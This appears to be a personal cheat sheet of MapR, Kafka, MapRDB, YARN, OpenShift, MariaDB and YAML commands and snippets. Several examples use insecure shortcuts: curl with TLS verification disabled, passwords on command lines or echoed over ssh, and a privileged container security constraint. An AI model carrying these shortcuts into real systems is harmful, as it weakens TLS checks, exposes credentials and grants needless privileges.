// properties.put("auto.commit.interval.ms", <default value 1000ms>)

import org.apache.kafka.clients.consumer.KafkaConsumer;
KafkaConsumer consumer = new KafkaConsumer<String, String>(properties);

String streamTopic = "<streamname>:<topicname>"; // "/streams/my-stream:topic-name"
consumer.subscribe(Arrays.asList(streamTopic));
// consumer.subscribe(topic, new RebalanceListener());
ConsumerRecords<String, String> messages = consumer.poll(1000L); // reading with timeout
messages.iterator().next().toString(); // "/streams/my-stream:topic-name, parition=1, offset=256, key=one, value=text"

java rebalance listener

public class RebalanceListener implements ConsumerRebalanceListener {
    public void onPartitionsAssigned(Collection<TopicPartition> partitions) { }
    public void onPartitionsRevoked(Collection<TopicPartition> partitions) { }
}

execute java app

[maven repository](https://repository.mapr.com/nexus/content/repositories/releases/)

<repositories>
  <repository>
    <id>mapr-maven</id>
    <url>http://repository.mapr.com/maven</url>
    <releases>
      <enabled>true</enabled>
    </releases>
    <snapshots>
      <enabled>false</enabled>
    </snapshots>
  </repository>
</repositories>
<dependencies>
  <dependency>
    <groupId>org.apache.kafka</groupId>
    <artifactId>kafka-clients</artifactId>
    <version>0.9.0.0-mapr-1602-streams-5.1.0</version>
    <scope>provided</scope>
  </dependency>
</dependencies>

execute on cluster

mapr classpath
java -cp `mapr classpath`:my-own-app.jar mypackage.MainClass

curl_user="cluster_user"
curl_pass="cluster_user_password"
stream_path="%2Fvantage%2Forchestration%2Fstreams%2Fpipeline"
topic_name="gateway"
host="https://ubsdpdesp000001.vantage.org"
port=8082

# maprcli stream topic list -path $stream_path # need to replace %2 with /

curl -u $curl_user:$curl_pass \
--insecure -s -X GET \
-H "Content-Type: application/vnd.kafka.v2+json" \
$host:$port/topics/$stream_path%3A$topic_name
URL_REST_API=https://mapr-web.vantage.zur:20702
# x-www-browser $URL_REST_API/app/swagger/

REST_API=${URL_REST_API}/api/v2
REST_API_TABLE=${REST_API}/table/  # ends with slash !!!
MAPR_DB_PATH=/vantage/store/tables/signals
SESSION_ID=efba27777-313d
curl -X GET --insecure -L -u $USER_DATA_API_USER:$USER_DATA_API_PASSWORD  ${REST_API_TABLE}${MAPR_DB_PATH}'?condition=\{"$eq":\{"session":"'$SESSION_ID'"\}\}&limit=1' | jq .

maprcli

login, print info, logout

maprlogin password -user {your cluster username}
# long term ticket
maprlogin password -user {your cluster username} -duration 30:0:0 -renewal 90:0:0

maprlogin print
maprlogin authtest

maprlogin logout

login with ticket file using to login

OCP_TICKET_NAME=maprticket
FILE_WITH_TICKET=prod.maprticket
oc get secret $OCP_TICKET_NAME -o json | jq .data.CONTAINER_TICKET -r  |  base64 --decode > $FILE_WITH_TICKET
maprlogin renew -ticketfile $FILE_WITH_TICKET

login via ssh

execution_string="echo '"$CLUSTER_PASS"' | maprlogin password -user cherkavi "
ssh $CLUSTER_USER@$CLUSTER_NODE $execution_string

check your credential, expiration date/time

maprlogin print -ticketfile <your ticketfile> 
# you will see expiration date like 
# on 07.05.2019 13:56:47 created = 'Tue Apr 23 13:56:47 UTC 2019', expires = 'Tue May 07 13:56:47 UTC 2019'

generate ticket

maprlogin generateticket -type service -cluster my61.cluster.com -duration 30:0:0 -out /tmp/mapr_ticket -user mapr

check status of the cluster, cluster health check

maprcli dashboard info -json

posix client

keys

$ wget -O - https://package.mapr.com/releases/pub/maprgpg.key | sudo apt-key add -

add these lines to /etc/apt/sources.list:

deb https://package.mapr.com/releases/v6.1.0/ubuntu binary trusty
deb https://package.mapr.com/releases/MEP/MEP-6.0.0/ubuntu binary trusty

installation

apt-get update
# apt-get install mapr-posix-client-basic
apt-get install mapr-posix-client-platinum

configuration

sudo mkdir /mapr
sudo scp $USERNAME@$EDGE_NODE:/opt/mapr/conf/mapr-clusters.conf /opt/mapr/conf/mapr-clusters.conf
sudo scp $USERNAME@$EDGE_NODE:/opt/mapr/conf/ssl_truststore /opt/mapr/conf/ssl_truststore

login

echo "$PASSWORD" | maprlogin password -user $USERNAME -out /tmp/mapruserticket

Yarn

yarn application -list -appStates ALL
yarn logs -applicationId application_1540813402987_9262 

list of accessible queues yarn queue

# map reduce job
mapred queue -showacls | grep SUBMIT_APPLICATIONS

MapRDB

application connector

preferred way for making connection to MapRDB - OJAI

DBShell commands

Two possible types of MaprDB:

# maprdb create table binary table
maprcli table create -path <path_in_maprfs>

# drill 
DRILL_HOST=https://mapr-web.vantage.zur:30101
MAPR_FS=/vantage/data/label/sessions
curl --request PUT --url ${DRILL_HOST}/api/v2/table/${MAPR_FS} --header 'Authorization: Basic '$BASE64_BASIC_AUTH_TOKEN

# maprdb create json table
maprcli table create -path <path_in_maprfs>  -tabletype json

# configuration for maprdb table
maprcli config save -values {"mfs.db.max.rowsize.kb":<value in KB>}

# maprdb table show regions
maprcli table region list -path <path_in_maprfs>
maprcli table region list -path <path_in_maprfs> -json

# maprdb table split
maprcli table region split -path <path_in_maprfs> -fid <region id like: 5358777.43.26313>
# in case of such message - check your table type binary/json
OJAI APIs are currently not supported with binary tables

OJAI log4j logging

            <Logger name="log4j.logger.com.mapr.ojai.store.impl" level="trace" additivity="false">
                <AppenderRef ref="stdout" />
                <AppenderRef ref="asyncFile" />
            </Logger>
            <Root level="trace">
                <AppenderRef ref="stdout" />
                <AppenderRef ref="asyncFile" />
            </Root>

Show info

maprcli table info -path /vantage/deploy/data-access-video/images -json
# !!! totalrows: Estimated number of rows in a table. Values may not match the actual number of rows. This variance occurs because the counter, for performance reasons, is not updated on each row.
# one of the fastest option - drill request: select count(*) from dfs.`/vantage/deploy/data-access-video/images`

# list of regions for table 
maprcli table region list -path /vantage/deploy/data-access-video/images -json

maprdb copy table backup table

mapr copytable -src {path to source} -dst {path to destination}
# without yarn involvement
mapr copytable -src {path to source} -dst {path to destination} -mapreduce false
# move table can be fulfilled with:
hadoop fs -mv

Remove table Delete table

maprcli table delete -path <path_in_maprfs>

Check access to table maprdb table info

maprcli table cf list -path /vantage/deploy/data-access-video/images -cfname default -json

Granting Access Permissions for User

!!! WARNING: please read the list of existing users before setting new ones !!!
maprcli table cf edit -path /vantage/deploy/data-access-video/images -cfname default -readperm u:tech_user_name
maprcli table cf edit -path /vantage/deploy/data-access-video/images -cfname default -readperm "u:tech_user_name | u:tech_user_name2"
maprcli table cf edit -path $TABLE_NAME -cfname default -readperm u:tech_user_name
maprcli table cf edit -path $TABLE_NAME -cfname default -writeperm u:tech_user_name
maprcli table edit -path $TABLE_NAME -adminaccessperm u:tech_user_name_admin -indexperm u:tech_user_name

maprdb records

show options

mapr dbshell
jsonoptions

maprdb query maprdb search maprdb find

# output to file stdout 
mapr dbshell 'find /mapr/prod/vantage/orchestration/tables/metadata --fields _id --limit 5 --pretty' > out.txt
mapr dbshell 'find /mapr/prod/vantage/orchestration/tables/metadata --fields _id,sessionId --where {"$eq":{"sessionId":"test-001"}} --limit 1'

# request inside shell
mapr dbshell
## more prefered way of searching: 
find /mapr/prod/vantage/orchestration/tables/metadata --query '{"$select":["mdf4Path.name","mdf4Path.fullPath"],"$limit":2}'
find /mapr/prod/vantage/orchestration/tables/metadata --query {"$select":["fullPath"],"$where":{"$lt":{"startTime":0}}} --pretty

find /mapr/prod/vantage/orchestration/tables/metadata --c {"$eq":{"session_id":"9aaa13577-ad80"}} --pretty

## fix issue with multiple document in output
# sed 's/^}$/},/g' $file_src > $file_dest

## less prefered way of searching: 
# last records, default sort: ASC
find /mapr/prod/vantage/orchestration/tables/metadata --fields _id --orderby loggerStartTime.utcNanos:DESC --limit 5
# amount of records: `maprcli table info -path /mapr/prod/vantage/orchestration/tables/metadata -json | grep totalrows`
find /mapr/prod/vantage/orchestration/tables/metadata --fields mdf4Path.name,mdf4Path.fullPath --limit 2 --offset 2 --where {"$eq":{"session_id":"9aaa13577-ad80"}} --orderby created_time
# array in output and in condition
find /mapr/prod/vantage/orchestration/tables/metadata --fields documentId,object_types[].id --where {"$eq":{"object_types[].id":"44447f6d853dd"}}
find /mapr/prod/vantage/orchestration/tables/metadata --fields documentId,object_types[].id --where {"$between":{"created_time":[159421119000000000,1595200100000000000]}} --limit 5

!!! important !!! if the output contains only "_id" and no other data, or you don't see all fields, try another user ( you don't have enough rights )

complex query

find /tbl --q {"$select":"a.c.e",
            "$where":{
                     "$and":[
                             {"$eq":{"a.b[0].boolean":false}},
                             {"$or":[
                                     {"$ne":{"a.c.d":5}},
                                     {"$gt":{"a.b[1].decimal":1}},
                                     {"$lt":{"a.b[1].decimal":10}}
                                     ]
                              }
                             ]
                      }
               }

query with counting amount of elements in array

find //tables/session --query {"$select":["_id"],"$where":{"$and":[{"$eq":{"vin":"BX77777"}},{"$sizeof":{"labelEvents":{"$ge":1}}}]}}

for data:

 "dag_data" : {
    "name" : "drive_markers",
    "number" : {
      "$numberInt" : -1
    }
  },
//  --limit 10 --pretty --c {"$notexists":"dag_data"}
//  --limit 10 --pretty --c {"$eq":{"dag_data.number":-1}}

example of inline execution

REQUEST="find /mapr/prod/vantage/orchestration/tables/metadata --fields mdf4Path.name,mdf4Path.fullPath --limit 2"
echo $REQUEST | tee script.sql
mapr dbshell --cmdfile script.sql > script.result
rm script.sql

example of execution via mapr web, web mapr, MaprDB read document

 MAPR_USER='user'
 MAPR_PASSWORD='password'
DOCUMENT_ID='d99-4a-ac-0cbd'
TABLE_PATH=/vantage/orchestration/tables/sessions
curl --silent  --insecure  -X GET -u $MAPR_USER:$MAPR_PASSWORD  https://mapr-web.vantage.zur:2002/api/v2/table/$TABLE_PATH/document/$DOCUMENT_ID | jq "." | grep labelEvent

# insert record - POST
# delete record - DELETE
insert --table /vantage/processed/tables/markers --id custom_id_1 --value '{"name": "Martha", "age": 35}'
# should be checked logic for inserting with "_id" inside document
# insert --table /vantage/processed/tables/markers --value '{"_id": "custom_id_1", "name": "Martha", "age": 35}'

FILE_CONTENT=$(cat my-record-in-file.json)
RECORD_ID=$(jq -r ._id my-record-in-file.json)
mapr dbshell "insert --table /vantage/processed/tables/markers --id $RECORD_ID --value '$FILE_CONTENT'"

possible error: You already provided '....' earlier

check your single quotes around the json object passed to --value

delete record in maprdb

delete --table /vantage/processed/tables/markers --id "custom_id_1"

Create an index for the thumbnail MapR JSON DB in order to speed up the query that finds all sessionIds with existing thumbnails

maprcli table index add -path /vantage/deploy/data-access-video/images -index frameNumber_id -indexedfields frameThumbnail
# maprcli table index add -path <path> -index <name> -indexedfields<fields>
# mapr index information ( check isUpdate )
maprcli table index list -path <path>
maprcli table cfcreate / delete / list

Describe data, describe table

mapr dbshell
desc /full/path/to/maprdb/table

manipulate with MapRDB via DbShell

MapRFS maprfs

you can check your current ticket using fs -ls

hadoop fs -mkdir -p /mapr/dp.stg/vantage/data/store/collected/car-data/MDF4/a889-017d6b9bc95b/
hadoop fs -ls /mapr/dp.stg/vantage/data/store/collected/car-data/MDF4/a889-017d6b9bc95b/
hadoop fs -rm -r /mapr/dp.stg/vantage/data/store/collected/car-data/MDF4/a889-017d6b9bc95b/
WEB_HDFS=https://ubssp000007:14000
PATH_TO_FILE="tmp/1.txt"
# BASE_DIR=/mapr/dc.stg.zurich
vim ${BASE_DIR}/$PATH_TO_FILE

MAPR_USER=$USER_API_USER
MAPR_PASS=$USER_API_PASSWORD
# read file
curl  -X GET "${WEB_HDFS}/webhdfs/v1/${PATH_TO_FILE}?op=open" -k -u ${MAPR_USER}:${MAPR_PASS}

# create folder
PATH_TO_NEW_FOLDER=tmp/example
curl -X PUT "${WEB_HDFS}/webhdfs/v1/${PATH_TO_NEW_FOLDER}?op=mkdirs" -k -u ${MAPR_USER}:${MAPR_PASS}

Mapr Hadoop run command on behalf of another user

TICKET_FILE=prod.maprticket
maprlogin renew -ticketfile $TICKET_FILE

# https://github.com/cherkavi/java-code-example/tree/master/console/java-bash-run
hadoop jar java-bash-run-1.0.jar utility.Main ls -la .

issues

with test execution ( scala, java )

Can not find IP for host: maprdemo.mapr.io

solution

# hard way
rm -rf /opt/mapr
# soft way
vim /opt/mapr/conf/mapr-clusters.conf

common issue

Caused by: javax.security.auth.login.LoginException: Unable to obtain MapR credentials
	at com.mapr.security.maprsasl.MaprSecurityLoginModule.login(MaprSecurityLoginModule.java:228)
echo "passw" | maprlogin password -user my_user_name

kerberos authentication

possible issue

  • javax.security.sasl.SaslException: GSS initiate failed
  • rm: Failed to move to trash: hdfs://eqstaging/user/my_user/equinix-staging-deployment-51: Permission denied: user=dataquality, access=WRITE, inode="/user/my_user/deployment-sensor_msgs":ubsdeployer:ubsdeployer:drwxr-xr-x
  • No Kerberos credential available

solution:

  • login into destination Edge node
  • execute 'kinit'
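a minimal sketch of that step ( principal and realm are placeholders ):

# obtain a Kerberos ticket on the destination Edge node
kinit my_user@EXAMPLE.REALM
# verify the ticket cache
klist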

Docker container with MapR docker image

docker local build

how to build mapr container locally

start locally

# ERROR: Invalid MAPR_TZ timezone ()
IMAGE_ID='maprtech/pacc:6.1.0_6.0.0_ubuntu16'
docker run --env MAPR_TZ="UTC" --env MAPR_CONTAINER_USER="temp_user" --env MAPR_CLDB_HOSTS="build_new_container" -it $IMAGE_ID /bin/sh

Security Context Constraints

FROM maprtech/pacc:6.1.0_6.0.0_ubuntu16

permission for image scc

allowHostDirVolumePlugin: true
allowHostIPC: false
allowHostNetwork: false
allowHostPID: false
allowHostPorts: false
allowPrivilegeEscalation: true
allowPrivilegedContainer: true
allowedCapabilities:
- NET_RAW
- SYS_ADMIN
- NET_ADMIN
- SETGID
- SETUID
- SYS_CHROOT
- CAP_AUDIT_WRITE
apiVersion: security.openshift.io/v1
defaultAddCapabilities: null
fsGroup:
  type: RunAsAny
groups:
- r-d-zur-func_engineer
- r-d-zur-engineer
kind: SecurityContextConstraints
metadata:
  generation: 26
  name: mapr-apps-netraw-scc
priority: 5
readOnlyRootFilesystem: false
requiredDropCapabilities: null
runAsUser:
  type: RunAsAny
seLinuxContext:
  type: MustRunAs
supplementalGroups:
  type: RunAsAny
users:
- system:serviceaccount:custom-user:default
volumes:
- configMap
- downwardAPI
- emptyDir
- flexVolume
- hostPath
- persistentVolumeClaim
- projected
- secret

java application in docker container

/opt/mapr/installer/docker/mapr-setup.sh container
java -Dzookeeper.sasl.client=false -classpath /opt/mapr/lib/hadoop-common-2.7.0-mapr-1808.jar:/opt/mapr/kafka/kafka-1.1.1/libs/*:/usr/src/lib/dq-kafka2storage-service-jar-with-dependencies.jar:/usr/src/classes:/usr/src/lib/maprfs-6.1.0-mapr.jar:/usr/src/lib/maprfs-6.1.0-mapr-tests.jar:/usr/src/lib/maprfs-diagnostic-tools-6.1.0-mapr.jar:/usr/src/lib/maprdb-6.1.0-mapr.jar:/usr/src/lib/maprdb-6.1.0-mapr-tests.jar:/usr/src/lib/maprdb-cdc-6.1.0-mapr.jar:/usr/src/lib/maprdb-cdc-6.1.0-mapr-tests.jar:/usr/src/lib/maprdb-mapreduce-6.1.0-mapr.jar:/usr/src/lib/maprdb-mapreduce-6.1.0-mapr-tests.jar:/usr/src/lib/maprdb-shell-6.1.0-mapr.jar:/usr/src/lib/maprdb-shell-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-hbase-6.1.0-mapr.jar:/usr/src/lib/mapr-hbase-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-ojai-driver-6.1.0-mapr.jar:/usr/src/lib/mapr-ojai-driver-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-streams-6.1.0-mapr.jar:/usr/src/lib/mapr-streams-6.1.0-mapr-tests.jar:/usr/src/lib/mapr-tools-6.1.0-mapr.jar:/usr/src/lib/mapr-tools-6.1.0-mapr-tests.jar:/usr/src/lib/mastgateway-6.1.0-mapr.jar:/usr/src/lib/slf4j-api-1.7.12.jar:/usr/src/lib/slf4j-log4j12-1.7.12.jar:/usr/src/lib/log4j-1.2.17.jar:/usr/src/lib/central-logging-6.1.0-mapr.jar:/usr/src/lib/antlr4-runtime-4.5.jar:/usr/src/lib/commons-logging-1.1.3-api.jar:/usr/src/lib/commons-logging-1.1.3.jar:/usr/src/lib/commons-lang-2.5.jar:/usr/src/lib/commons-configuration-1.8.jar:/usr/src/lib/commons-collections-3.2.2.jar:/usr/src/lib/jackson-core-2.11.1.jar:/usr/src/lib/jackson-databind-2.11.1.jar:/usr/src/lib/jline-2.11.jar:/usr/src/lib/joda-time-2.0.jar:/usr/src/lib/json-1.8.jar:/usr/src/lib/kafka-clients-1.1.1-mapr-1808.jar:/usr/src/lib/ojai-3.0-mapr-1808.jar:/usr/src/lib/ojai-mapreduce-3.0-mapr-1808.jar:/usr/src/lib/ojai-scala-3.0-mapr-1808.jar:/usr/src/lib/protobuf-java-2.5.0.jar:/usr/src/lib/trove4j-3.0.3.jar:/usr/src/lib/zookeeper-3.4.11-mapr-1808.jar:/usr/src/lib/jackson-annotations-2.11.1.jar com.ubs.ad.data.Kafka2Storage

MariaDB cheat sheet

links

execute docker container ( utf8 ):

docker pull mariadb

docker run --name mysql-container --volume /my/local/folder/data:/var/lib/mysql --publish 3306:3306 --env MYSQL_ROOT_PASSWORD=root --detach mariadb --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

execute docker container, create DB with specific name, execute all scripts in folder:

docker pull mariadb

docker run --name mysql-container --volume /my/local/folder/data:/var/lib/mysql --volume /my/path/to/sql:/docker-entrypoint-initdb.d --publish 3306:3306 --env MYSQL_ROOT_PASSWORD=root --env MYSQL_DATABASE={databasename} --detach mariadb --character-set-server=utf8mb4 --collation-server=utf8mb4_unicode_ci

config file, conf file

cat /etc/mysql/mysql.conf.d/mysqld.cnf

connect to mysql using shell tool:

mysql --user=root --password=root
mysql --user=root --password=root --host=127.0.0.1 --port=3306
docker exec -it mysql-container  /usr/bin/mysql  --user=root --password=root

mycli connect

mycli mysql://user_name:passw@mysql_host:mysql_port/schema
# via ssh 
mycli --ssh-user heritageweb --ssh-host 55.55.55.54 mysql://user_name:passw@mysql_host:mysql_port/schema
#   --ssh-user, --ssh-password

.myclirc settings for vertical output

auto_vertical_output = True

mycli execute script, mycli

mycli mysql://user_name:passw@mysql_host:mysql_port/schema --execute "select * from dual"
mycli mysql://user_name:passw@mysql_host:mysql_port/schema < some-sql.txt
mycli mysql://user_name:passw@mysql_host:mysql_port/schema
help;
source some-sql.txt;

import db export db, archive, backup db, restore db, recovery db

prerequisites

## try just to connect to db
mysql --host=mysql-dev-eu.a.db.ondigitalocean.com --port=3060 --user=admin --password=my_passw --database=masterdb 
## docker mysql client 
docker run -it mariadb mysql --host=mysql-dev-eu.a.db.ondigitalocean.com --port=3060 --user=admin --database=masterdb --password=my_passw
## enable server logging !!!
### server-id = 1
### log_bin = /var/log/mysql/mysql-bin.log
sudo sed -i '/server-id/s/^#//g' /etc/mysql/mysql.conf.d/mysqld.cnf && sudo sed -i '/log_bin/s/^#//g' /etc/mysql/mysql.conf.d/mysqld.cnf

mysql dump mariadb dump

# mysqldump installation
# sudo apt install mysql-client-core-8.0
MY_HOST="mysql-dev-eu.a.db.ondigitalocean.com"
MY_USER="admin"
MY_PASS="my_pass"
MY_PORT="3060"
MY_DB="masterdb"
MY_BACKUP="backup.sql"
### backup ( pay attention to 'database' key )
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS $MY_DB > $MY_BACKUP
# 'Access denied; you need (at least one of) the PROCESS privilege(s) for this operation' when trying to dump tablespaces
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --no-tablespaces  $MY_DB > $MY_BACKUP
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --databases $MY_DB > $MY_BACKUP
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --databases $MY_DB --extended-insert | sed 's$),($),\n($g' > $MY_BACKUP
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --databases $MY_DB --extended-insert=FALSE  > $MY_BACKUP
mysqldump --databases ghost_prod --master-data=2 -u $MY_USER -p --single-transaction --order-by-primary -r $MY_BACKUP

# backup only selected tables 
mysqldump --host=$MY_HOST --port=$MY_PORT --user=$MY_USER --password=$MY_PASS --extended-insert=FALSE $MY_DB table_1 table_2 > $MY_BACKUP
# backup only selected table with condition 
mysqldump --host=$MY_HOST --user=$MY_USER --port=$MY_PORT --password=$MY_PASS --extended-insert=FALSE --where="column_1=0" --no-create-info $MY_DB table_1 > $MY_BACKUP
### restore #1
mysql -u $MY_USER -p $MY_DB < $MY_BACKUP
# restore #2 
mysql -u $MY_USER -p 
use DATABASE
source /home/user/backup.sql

dump

  • manual start and stop
    • make the server ReadOnly
    mysql> FLUSH TABLES WITH READ LOCK;
    mysql> SET GLOBAL read_only = ON;
    • make dump
    • back server to Normal Mode
    mysql> SET GLOBAL read_only = OFF;
    mysql> UNLOCK TABLES;    
  • with one command without manual step
    • mysqldump --master-data --single-transaction > backup.sql

dump tools

  • ubuntu utility: automysqlbackup
  • raw solution via cron
    crontab -e
    # And add the following config
50 23 */2 * * mysqldump -u mysqldump DATABASE 2>/dev/null | gzip > dump.sql.gz
  • raw to s3cmd (amazon, digitalocean...)
  • dump with binary log position
    # innodb
    mysqldump --single-transaction --flush-logs --master-data=2 --all-databases --delete-master-logs > backup.sql
    # not innodb
    mysqldump --lock-tables

cold backup (copy raw files)

If you can shut down the MySQL server, you can make a physical backup that consists of all files used by InnoDB to manage its tables. Use the following procedure:

  • Perform a slow shutdown of the MySQL server and make sure that it stops without errors.
  • Copy all InnoDB data files (ibdata files and .ibd files)
  • Copy all InnoDB log files (ib_logfile files)
  • Copy your my.cnf configuration file

backup issue: during backup strange message appears: "Enter password:" even with password in command line

vim .my.cnf
[mysqldump]
user=mysqluser
password=secret
# !!! without password !!!
mysqldump --host=mysql-dev-eu.a.db.ondigitalocean.com --user=admin --port=3060 masterdb table_1 table_2 > backup.sql

execute sql file with mysqltool

  • inside mysql
    source /path/to/file.sql
  • shell command
    mysql -h hostname -u user database < path/to/test.sql
  • via docker
    docker run -it --volume $(pwd):/work mariadb mysql --host=eu-do-user.ondigitalocean.com --user=admin --port=25060 --database=master_db --password=pass
    # docker exec --volume $(pwd):/work -it mariadb
    source /work/zip-code-us.sql

show databases and switch to one of them:

show databases;
use {databasename};

user <-> role

user role relationship

users

show grants;
SELECT host, user FROM mysql.user where user='www_admin'

grant access

GRANT ALL PRIVILEGES ON `www\_masterdb`.* TO `www_admin`@`%`;

print all tables

show tables;

print all tables and all columns

select table_name, column_name, data_type from information_schema.columns
 where TABLE_NAME like 'some_prefix%'
order by TABLE_NAME, ORDINAL_POSITION

print all columns in table, show table structure

describe table_name;
show columns from table_name;
select * from information_schema.columns where TABLE_NAME='listings_dir' and COLUMN_NAME like '%PRODUCT%';
mycli mysql://user:passw@host:port/schema --execute "select table_name, column_name, data_type  from information_schema.columns where TABLE_NAME like 'hlm%' order by TABLE_NAME, ORDINAL_POSITION;" | awk -F '\t' '{print $1","$2","$3}' > columns

add column

-- pay attention to quotas around names
ALTER TABLE `some_table` ADD `json_source` varchar(32) NOT NULL DEFAULT '';
-- don't use 'ALTER COLUMN'
ALTER TABLE `some_table` MODIFY `json_source` varchar(32) NULL;

rename column

alter table messages rename column sent_time to sent_email_time;

mysql version

SELECT VERSION();

example of spring config

  • MariaDB
    ds.setMaximumPoolSize(20);
    ds.setDriverClassName("org.mariadb.jdbc.Driver");
    ds.setJdbcUrl("jdbc:mariadb://localhost:3306/db");
    ds.addDataSourceProperty("user", "root");
    ds.addDataSourceProperty("password", "myPassword");
    ds.setAutoCommit(false);
    // jdbc.dialect:
    //   org.hibernate.dialect.MariaDBDialect
    //   org.hibernate.dialect.MariaDB53Dialect
  • MySQL
    jdbc.driver: com.mysql.jdbc.Driver
    jdbc.dialect: org.hibernate.dialect.MySQL57InnoDBDialect
    jdbc:mysql://localhost:3306/bpmnui?serverTimezone=Europe/Brussels
    

maven dependency

  • MySQL
    ds.setDriverClassName("com.mysql.jdbc.Driver");
    <dependency>
        <groupId>mysql</groupId>
        <artifactId>mysql-connector-java</artifactId>
        <version>6.0.6</version>
    </dependency>
  • MariaDB
    ds.setDriverClassName("org.mariadb.jdbc.Driver");
    <dependency>
        <groupId>org.mariadb.jdbc</groupId>
        <artifactId>mariadb-java-client</artifactId>
        <version>2.2.4</version>
    </dependency>

create database:

DROP DATABASE IF EXISTS {databasename};
CREATE DATABASE {databasename}
  CHARACTER SET = 'utf8'
  COLLATE = 'utf8_general_ci'; 
-- 'utf8_general_ci' - case insensitive
-- 'utf8_general_cs' - case sensitive

create table, autoincrement

create table IF NOT EXISTS `hlm_auth_ext`(
  `auth_ext_id` bigint NOT NULL AUTO_INCREMENT PRIMARY KEY,
  `uuid` varchar(64) NOT NULL
)  ENGINE=InnoDB AUTO_INCREMENT=10001 DEFAULT CHARSET=utf8;

create column if not exists

ALTER TABLE test ADD COLUMN IF NOT EXISTS column_a VARCHAR(255);

show ddl, ddl for table, ddl table

SHOW CREATE TABLE yourTableName;

table indexes of table

SHOW INDEX FROM my_table_name;

table constraints of table, show constraints

select COLUMN_NAME, CONSTRAINT_NAME, REFERENCED_COLUMN_NAME, REFERENCED_TABLE_NAME from information_schema.KEY_COLUMN_USAGE where TABLE_NAME = 'my_table_name';

subquery returns more than one row, collect comma delimiter, join columns in one group columns

select 
    u.name_f, 
    u.name_l, 
    (select GROUP_CONCAT(pp.title, '')
    from hlm_practices pp where user_id=100
    )
from hlm_user u 
where u.user_id = 100;

date diff, compare date, datetime substraction

----- return another date with shifting by interval
-- (now() - interval 1 day)
----- return amount of days between two dates
-- datediff(now(), datetime_field_in_db )

value substitution string replace

select (case when unsubscribed>0 then 'true' else 'false' end) from lm_user limit 5;

check data

-- check url
SELECT url FROM licenses WHERE length(url)>0 and url NOT REGEXP '^https?://';
-- check encoding
SELECT subject FROM mails WHERE subject <> CONVERT(subject USING ASCII);
-- check email address
SELECT email FROM mails WHERE length(email)>0 and upper(email) NOT REGEXP '^[a-zA-Z0-9+_.-]+@[a-zA-Z0-9.-]+$';

Search

simple search

case search, case sensitive, case insensitive

-- case insensitive search
AND q.summary LIKE '%my_criteria%'

-- case sensitive ( if at least one operand is binary string )
AND q.summary LIKE BINARY '%my_criteria%'

similar search

sounds like

select count(*) from users where soundex(name_first) = soundex('vitali');
select count(*) from listing where soundex(description) like concat('%', soundex('asylum'),'%');

full text fuzzy search

search match

SELECT pages.*,
       MATCH (head, body) AGAINST ('some words') AS relevance,
       MATCH (head) AGAINST ('some words') AS title_relevance
FROM pages
WHERE MATCH (head, body) AGAINST ('some words')
ORDER BY title_relevance DESC, relevance DESC
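MATCH ... AGAINST needs a FULLTEXT index that matches the searched column list; a sketch for the table used above ( connection parameters are placeholders ):

mycli mysql://user_name:passw@mysql_host:mysql_port/schema --execute "ALTER TABLE pages ADD FULLTEXT INDEX ft_head_body (head, body)"
mycli mysql://user_name:passw@mysql_host:mysql_port/schema --execute "ALTER TABLE pages ADD FULLTEXT INDEX ft_head (head)"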

custom function, UDF

DROP FUNCTION if exists `digits_only`;
DELIMITER $$

CREATE FUNCTION `digits_only`(in_string VARCHAR(100) CHARACTER SET utf8)
RETURNS VARCHAR(100)
NO SQL
BEGIN

    DECLARE ctrNumber VARCHAR(50);
    DECLARE finNumber VARCHAR(50) DEFAULT '';
    DECLARE sChar VARCHAR(1);
    DECLARE inti INTEGER DEFAULT 1;

    -- swallow all exceptions, continue in any exception
    DECLARE CONTINUE HANDLER FOR SQLEXCEPTION
    BEGIN

    END;

    IF LENGTH(in_string) > 0 THEN
        WHILE(inti <= LENGTH(in_string)) DO
            SET sChar = SUBSTRING(in_string, inti, 1);
            SET ctrNumber = FIND_IN_SET(sChar, '0,1,2,3,4,5,6,7,8,9');
            IF ctrNumber > 0 THEN
                SET finNumber = CONCAT(finNumber, sChar);
            END IF;
            SET inti = inti + 1;
        END WHILE;
        IF LENGTH(finNumber) > 0 THEN
            RETURN finNumber;
        ELSE
            RETURN NULL;
        END IF;
    ELSE
        RETURN NULL;
    END IF;
END$$
DELIMITER ;
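usage check for the function defined above ( connection parameters are placeholders ):

mycli mysql://user_name:passw@mysql_host:mysql_port/schema --execute "SELECT digits_only('abc-123-def-456')"
# expected result: 123456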

issues

insert datetime issue

-- `date_start_orig` datetime NOT NULL,
(1292, "Incorrect datetime value: '0000-00-00 00:00:00' for column 'date_start_orig' at row 1")

to cure it:

'1970-01-02 00:00:00'
-- or 
SET SQL_MODE='ALLOW_INVALID_DATES';

Yet Another Markup Language cheat sheet

indentation

2 spaces

data types

  • string
  • number
  • boolean
  • list
  • map
host: ger-43
datacenter:
  location: Germany
  cab: "13"
  cab_unit: 3

# block-style
list_of_strings:
- one
- two
- three
# flow-style
another_list_of_strings: [one,two,three]

# block-style
map_example:
  - element_1: one
  - element_2: two
# flow-style
map_example2: {element_1: one , element_2: two }

more complex example - a list of maps

credentials:
  - name: 'user1'
    password: 'pass1'
  - name: 'user2'
    password: 'pass2'

comment

# this is comment in yaml
user_name: cherkavi # comment after the value
user_password: "my#secret#password"

multiline

  • one line string ( new line markers removed )
comments: >
  Attention, high I/O
  since 2019-10-01.
  Fix in progress.
  • each line of text keeps its new line marker ( new lines preserved )
downtime_sch: |
  2019-10-05 - kernel upgrade
  2019-02-02 - security fix

multi documents

---
name: first document

---
name: second document

# not necessary marker ...
...
---
name: third document

place of metadata, header

# this is metadata storage place
---
name: first document

anchor, reference

& - anchor

* - reference to anchor

simple reference:
---
host: my_host_01
description: &AUTO_GENERATE standard host without specific roles
---
host: my_host_02
description: *AUTO_GENERATE

reference to map

users:
  - name: &user_a1 a1    # define anchor "user_a1" ( anchor must come before the value )
    manager:
  - name: a2
    manager: *user_a1    # reference to anchor "user_a1"

example with collection

---
host: my_host_01
roles: &special_roles
  - ssh_server
  - apache_server
